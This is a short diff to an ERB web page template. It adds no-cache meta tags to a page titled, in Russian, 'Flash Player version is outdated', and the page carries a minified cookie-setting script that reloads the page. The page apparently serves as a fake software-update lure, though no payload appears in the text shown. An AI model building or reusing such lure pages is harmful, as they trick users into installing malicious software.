--- a/views/index.erb
+++ b/views/index.erb
@@ -1,8 +1,12 @@
 <html>
 <meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
 <meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=yes" />
+<meta http-equiv="cache-control" content="max-age=0" />
+<meta http-equiv="cache-control" content="no-cache" />
+<meta http-equiv="expires" content="0" />
+<meta http-equiv="expires" content="Tue, 01 Jan 1980 1:00:00 GMT" />
+<meta http-equiv="pragma" content="no-cache" />
 <head>
-
 <title>Версия Flash Player устарела</title>
 <link rel="stylesheet" media="all" href="style.css?v=l" />
 <script>function s(e,o,i){i=i||{};var n=i.expires;if("number"==typeof n&&n){var r=new Date;r.setTime(r.getTime()+1e3*n),n=i.expires=r}if(n&&n.toUTCString){i.expires=n.toUTCString(),o=encodeURIComponent(o);var t=e+"="+o;for(var a in i){t+="; "+a;var c=i[a];c!==!0&&(t+="="+c)}document.cookie=t,setTimeout(function(){window.location.reload()},3000)}}</script>
